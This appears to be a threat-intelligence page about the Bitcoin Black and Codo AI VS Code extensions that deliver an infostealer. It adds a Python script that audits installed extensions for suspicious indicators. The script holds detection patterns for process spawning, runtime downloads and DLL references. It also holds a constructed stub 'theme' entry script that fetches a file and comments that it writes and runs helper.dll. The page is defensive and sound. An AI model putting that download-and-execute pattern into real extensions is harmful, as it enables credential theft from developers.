
Bitcoin Black and Codo AI VS Code extensions delivering infostealer

Malware Activity
Happening score: 34
2 unique sources, 2 articles

Summary


The Bitcoin Black and Codo AI extensions on Microsoft's Visual Studio Code Marketplace, posing as a color theme and an AI assistant respectively, deliver an infostealer to developers' machines, creating an immediate risk of stolen credentials, crypto wallets, and browser sessions. The malicious code uses DLL hijacking and hidden download steps so that installation and execution raise no obvious warning to the user. The activity matters because a compromised developer workstation exposes both the secrets stored locally and the online sessions that those credentials and browser cookies keep open.
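The summary's point, that a "color theme" has no business shipping an entry script that downloads files and spawns processes, translates directly into a triage check a practitioner can run over their own installed extensions. The audit below is an added example written for this page; it is not code from the original article, from Koi Security, or from Microsoft. It relies only on documented VS Code manifest conventions (a theme contributes `themes`, `iconThemes` or `productIconThemes` and needs no `main`; `activationEvents` of `*` or `onStartupFinished` mean unconditional activation) and scans the entry script for the download, process-spawning and native-binary indicators the page describes. The sample manifest and entry script embedded at the bottom are constructed for the example, with hypothetical names; they are not the real Bitcoin Black or Codo AI artifacts.

```python
import json
import re
from pathlib import Path

# Indicators in an extension's entry script that a real colour theme or a thin
# "assistant" should never need: spawning processes, fetching content at runtime,
# dynamic code execution, or references to native Windows binaries (the DLL
# hijacking step described on the page).
SUSPICIOUS_SOURCE = [
    (r"\brequire\((['\"])child_process\1\)", "entry script spawns child processes"),
    (r"\b(?:https?\.get|https?\.request|fetch)\s*\(", "entry script downloads content at runtime"),
    (r"\bnew Function\b|\beval\s*\(", "entry script uses dynamic code execution"),
    (r"\.(?:dll|exe)\b", "entry script references a native Windows binary"),
]
# Contribution points that make an extension look like a theme.
THEME_ONLY_KEYS = {"themes", "iconThemes", "productIconThemes"}


def audit_manifest(manifest: dict, entry_source: str = "") -> list[str]:
    """Return human-readable findings for one package.json and its entry script."""
    findings = []
    contributes = manifest.get("contributes") or {}
    looks_like_theme = bool(set(contributes) & THEME_ONLY_KEYS)
    entry_point = manifest.get("main") or manifest.get("browser")
    if looks_like_theme and entry_point:
        findings.append("theme extension declares an executable entry point")
    events = manifest.get("activationEvents") or []
    if "*" in events or "onStartupFinished" in events:
        findings.append("activates unconditionally at startup")
    for pattern, description in SUSPICIOUS_SOURCE:
        if re.search(pattern, entry_source):
            findings.append(description)
    return findings


def audit_extension_dir(ext_dir: Path) -> list[str]:
    """Audit one directory under ~/.vscode/extensions: package.json plus its `main`."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    source = ""
    entry = manifest.get("main") or manifest.get("browser")
    if entry:
        entry_path = ext_dir / entry
        # `main` may omit the .js suffix, as Node module resolution allows.
        for candidate in (entry_path, entry_path.with_suffix(".js")):
            if candidate.is_file():
                source = candidate.read_text(encoding="utf-8", errors="replace")
                break
    return audit_manifest(manifest, source)


def audit_all(extensions_root: Path) -> dict[str, list[str]]:
    """Map extension directory name -> findings for every extension that has a manifest."""
    results = {}
    for ext_dir in sorted(p for p in extensions_root.iterdir() if p.is_dir()):
        if (ext_dir / "package.json").is_file():
            findings = audit_extension_dir(ext_dir)
            if findings:
                results[ext_dir.name] = findings
    return results


# Constructed sample (hypothetical names, not a real marketplace listing): a "theme"
# that also ships an always-on entry script which downloads and runs a native payload.
SAMPLE_THEME_MANIFEST = {
    "name": "example-dark-theme",
    "publisher": "example-publisher",
    "main": "./extension.js",
    "activationEvents": ["*"],
    "contributes": {"themes": [{"label": "Example Dark", "uiTheme": "vs-dark", "path": "./theme.json"}]},
}
SAMPLE_THEME_SOURCE = """
const https = require('https');
const { spawn } = require('child_process');
https.get('https://example.invalid/update', res => { /* writes helper.dll, then runs it */ });
"""
# Constructed benign theme for contrast: only a theme contribution, no entry point.
SAMPLE_BENIGN_MANIFEST = {
    "name": "plain-theme",
    "contributes": {"themes": [{"label": "Plain", "uiTheme": "vs", "path": "./theme.json"}]},
}

if __name__ == "__main__":
    print("constructed suspicious theme ->", audit_manifest(SAMPLE_THEME_MANIFEST, SAMPLE_THEME_SOURCE))
    print("constructed benign theme ->", audit_manifest(SAMPLE_BENIGN_MANIFEST) or ["no findings"])
    installed = Path.home() / ".vscode" / "extensions"
    if installed.is_dir():
        for name, findings in audit_all(installed).items():
            print(name, "->", findings)
```

The heuristics are deliberately coarse: a legitimate extension that bundles minified dependencies may trip the download or `eval` patterns, so treat a hit as a reason to open the extension directory and read the entry script, not as a verdict. The strongest signal on its own is the first one, a theme contribution combined with an executable entry point, because nothing in the theme format requires code to run.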

Related Happenings

MuddyWater broad cyber-espionage campaign across sectors and countries

Campaign
First: 14.05.2026 00:59 Last: 14.05.2026 00:59 Sources 1

About this happening: **MuddyWater** was tied to a **2026 espionage campaign** affecting **at least nine organizations** across **nine countries** on **four continents**, with victims in **industrial a...

GlassWorm Zig dropper infecting developer IDEs

Malware Activity
First: 10.04.2026 16:23 Last: 10.04.2026 16:23 Sources 1

About this happening: The **GlassWorm** malware set now uses a **Zig dropper** that can silently infect **all VS Code-based IDEs** on a developer's machine, widening the reach of the compromise. The pa...

GlassWorm supply-chain malware wave across GitHub, npm, and VSCode/OpenVSX

Malware Activity
First: 17.03.2026 23:42 Last: 17.03.2026 23:42 Sources 1

About this happening: **GlassWorm** returned in a **new coordinated supply-chain attack** that compromised **433 components** across **GitHub, npm, and VSCode/OpenVSX**, creating a broad software-distr...

Latest development: 28.04.2026 00:41

GlassWorm returned in an OpenVSX supply-chain wave with 73 cloned sleeper extensions that were benign at upload and later turned malicious after an update, with six already activated to deliver malware. The extensions act as thin loaders that fetch payloads through GitHub-hosted secondary VSIX packages, platform-specific .node modules, or heavily obfuscated JavaScript, shifting the campaign toward submitting innocuous extensions first and introducing the malicious payload later.

Storm-2561 SEO-poisoning VPN credential-theft campaign

Campaign
First: 13.03.2026 15:38 Last: 13.03.2026 15:38 Sources 1

About this happening: The **Storm-2561** group is running a **credential-theft campaign** that uses **SEO poisoning** and fake **VPN clients** to steal **VPN credentials** from people searching for ent...

A0Backdoor malware deployed through signed MSI sideloading and DNS MX C2

Malware Activity
First: 10.03.2026 00:50 Last: 10.03.2026 00:50 Sources 1

About this happening: The **A0Backdoor** malware was deployed on **Windows endpoints** through **digitally signed MSI installers** and **DLL sideloading**, giving the operators a stealthier path to exe...

Timeline

  1. 09.12.2025 00:30 · 2 articles

    Koi Security reports malicious VS Code extensions on Microsoft's registry

    Initial Disclosure

    Koi Security identified Bitcoin Black and Codo AI on Microsoft's Visual Studio Code Marketplace as malicious extensions that masquerade as a color theme and an AI assistant while delivering an infostealer to developers' machines, with capabilities to steal screenshots, credentials, browser sessions, and crypto wallets.
